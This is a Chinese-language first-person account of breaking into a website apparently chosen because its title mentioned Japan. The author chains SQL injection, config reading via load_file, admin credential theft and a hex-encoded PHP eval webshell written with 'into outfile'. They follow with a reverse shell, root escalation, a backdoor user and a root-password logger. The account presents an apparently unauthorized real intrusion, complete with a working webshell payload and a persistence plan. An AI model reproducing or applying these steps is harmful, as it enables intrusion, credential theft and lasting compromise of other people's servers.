这站杂说了,看了看标题带了日本2个字,ok,都清楚了,准备好锤子敲进去。
扫描了下站点,发现存在猪肉点,手工测试了下,如图:
我们来查看下相关的信息,如图:
是root,权限还不错哦。
SYSTEM_USER()
SESSION_USER()
CURRENT_USER()
返回结果都为root,ok看能不能outfile个一句话出来,测试发现不行,纠结啊..
看来只有破解后台密码,进后台拿webshell了。通过load_file读取了配置,发现了后台地址和mysql账号
由于mysql是>5.0版本的,测试了下,顺利射出了后台账号和密码
MD5解了之后进后台寻找拿webshell的地方,发现有上传,但是不能利用。经小胖胖查看发现了一个地方可以执行sql语句
于是写个一句话进去看看:select 0x3c3f706870206576616c28245f524551554553545b636d645d293b3f3e into outfile ‘/home/xxx/xxx.php’
这回成功了,后台经小胖看了下文件,发现search.php处理SQL语句里 调用了StripSlashes 去掉了斜线。
拿到webshell了,接下来提权,uname -a看了下
看来有戏,先反弹个cmdline shell回来
查找exp提权获取了root,本想装个ddrk或者mafix后门,结果米有成功,还是加个用户玩玩吧
用putty登录下看看,root权限
最后安装个记录root密码的小东西吧
本文摘自网络由网络安全(www.91ri.org) 收集整理.
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号